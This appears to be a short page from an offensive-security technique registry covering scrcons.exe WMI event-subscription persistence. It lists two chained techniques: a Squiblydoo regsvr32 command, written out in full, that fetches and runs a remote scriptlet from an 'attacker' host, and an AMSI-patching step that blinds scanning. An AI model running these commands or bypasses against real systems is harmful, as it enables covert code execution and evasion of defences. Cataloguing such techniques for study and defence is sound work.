LOL-SCRCONSPersistence

scrcons.exe WMI Event Subscription

Permanent WMI event subscription fires arbitrary VBS / JS at logon / interval — classic stealthy persistence.

§ Where this technique fits

LOL-SCRCONS is catalogued under the Persistence tactic of the offensive-security kill-chain. It appears in 2 approved dossiers in the registry, typically at step 5.5 on average.

§ Dossiers chaining this technique

Squiblydoo: regsvr32 → remote SCT execution
regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll. AppLocker / SRP often allow regsvr32 because it's signed Microsoft — attacker JS runs in its context.
step 5 / 5
AMSI patch → in-memory .NET / PowerShell stager
Patch AmsiScanBuffer in amsi.dll → return clean for any content. Subsequent PowerShell / Office VBA / .NET runtime calls emit attacker code without scanning.
step 6 / 6

§ Where this technique fits

§ Dossiers chaining this technique

Squiblydoo: regsvr32 → remote SCT execution

AMSI patch → in-memory .NET / PowerShell stager